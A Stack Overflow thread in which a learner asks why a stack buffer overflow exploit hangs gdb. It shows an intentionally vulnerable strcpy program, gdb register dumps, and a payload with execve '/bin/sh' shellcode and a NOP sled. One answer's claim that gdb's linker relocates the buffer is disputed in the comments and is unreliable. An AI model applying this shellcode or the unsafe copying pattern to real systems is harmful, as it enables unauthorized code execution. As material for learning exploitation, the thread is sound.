2

I'm trying to learn buffer overflow but I found myself in dead end. When I want to execute shellcode gdb just stuck and dont react to anything (Ctrl-C, Ctrl-D, Enter, Esc) and I have to close terminal and run everything again. I have this vulnerable program running on Linux 64 bit:

int main(int argc, char **argv) {
    char buffer[256];
    if (argc != 2) {
        exit(0);
    }
    printf("%p\n", buffer);
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    return 0;
}

In gdb:

$ gcc vuln.c -o vuln -g -z execstack -fno-stack-protector
$ sudo gdb -q vuln
(gdb) list
1   #include <stdio.h>
2   #include <string.h>
3   #include <stdlib.h>
4   
5   int main(int argc, char **argv) {
6       char buffer[256];
7       if (argc != 2) {
8           exit(0);
9       }
10      printf("%p\n", buffer);
(gdb) break 5
Breakpoint 1 at 0x4005de: file vuln.c, line 5.
(gdb) run $(python3 -c 'print("A" * 264 + "B" * 6)')
Starting program: /home/vladimir/workspace/hacking/vuln $(python3 -c 'print("A" * 264 + "B" * 6)')

Breakpoint 1, main (argc=2, argv=0x7fffffffe378) at vuln.c:7
7       if (argc != 2) {
(gdb) cont
Continuing.
0x7fffffffe190
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
(gdb) i r
rax            0x0  0
rbx            0x0  0
rcx            0x7ffff7b01ef4   140737348902644
rdx            0x7ffff7dd28c0   140737351854272
rsi            0x602260 6300256
rdi            0x0  0
rbp            0x4141414141414141   0x4141414141414141
rsp            0x7fffffffe2a0   0x7fffffffe2a0
r8             0xfffffffffffffff0   -16
r9             0xffffffffffffff00   -256
r10            0x60236e 6300526
r11            0x246    582
r12            0x4004e0 4195552
r13            0x7fffffffe370   140737488348016
r14            0x0  0
r15            0x0  0
rip            0x424242424242   0x424242424242
(gdb) run $(python3 -c 'print("\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" + "\x90" * 233 + "\x90\xe1\xff\xff\xff\x7f")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vladimir/workspace/hacking/vuln $(python3 -c 'print("\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" + "\x90" * 233 + "\x90\xe1\xff\xff\xff\x7f")')

Breakpoint 1, main (argc=2, argv=0x7fffffffe288) at vuln.c:7
7       if (argc != 2) {
(gdb) cont
Continuing.
0x7fffffffe0a0

After address there is also printed some garbage and as said gdb get stucked. Even if I run program in the same session of gdb, with these two different inputs, the address of buffer somehow changes and I cant think of why. Can someone tell me why gdb stuck and why address is changing? What am I doing wrong?

Improve this question

2 Answers 2

Reset to default
1

Each time you run your compiled program, gdb will call the the linker to allocate some space for buffer. There's no guarantee that it will be in the same space each time, and gdb might deliberately put it somewhere else to keep different runs separate.

What you're doing with the C program here is causing an error which is trapped by the operating system and cleaned up. There's a huge gap between causing a simple buffer overflow and being able to use that to run shell commands. You have code to do the first bit, but you need a lot more insight to do the second bit.

If you really want to do this sort of thing, you're going to have to do a fair bit more reading to understand what's going on, and what you might be able to do.

Improve this answer
4
  • Hi, thanks for the answer. Can you just tell me, when I successfuly change instruction pointer, what is the next step here? Is problem here shellcode, becouse I've found it on the web and it might be old/patched or whatever? Also can you suggest some good readings on this topic, I'm really interested? I've currently reading Hacking: The Art of Exploitation, its mind opening book at least for me. Thanks again
    – vm381
    Commented Oct 6, 2018 at 19:31
  • No, GDB disables address space layout randomization by default. See show disable-randomization.
    – Florian Weimer
    Commented Oct 6, 2018 at 19:32
  • @FlorianWeimer I can't disagree with you there, but you can see from the transcript that it's putting buffer in a different place when it's run for the second time. If it's not address space layout randomization, it's something else.
    – Tim
    Commented Oct 6, 2018 at 22:00
  • @vm381 The problem here is that you have a nicely running car engine, and you're hoping that if you tap one of the loose parts slightly at the right time, you can get the car to turn right instead of left. What you're actually doing here is throwing a hand grenade into the engine, with the result that the whole thing explodes and dies. If you're hoping that by overrunning the buffer you can put something in which will cause the process to execute something else, you'll have to, for example, put an address in which execution is transferred to, not just "AAAABBBBBBB".
    – Tim
    Commented Oct 6, 2018 at 22:06
0

The address changes because the stack pointer upon entering main depends on the total length of the command line arguments. The two python snippets generate data of different lengths.

Improve this answer

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.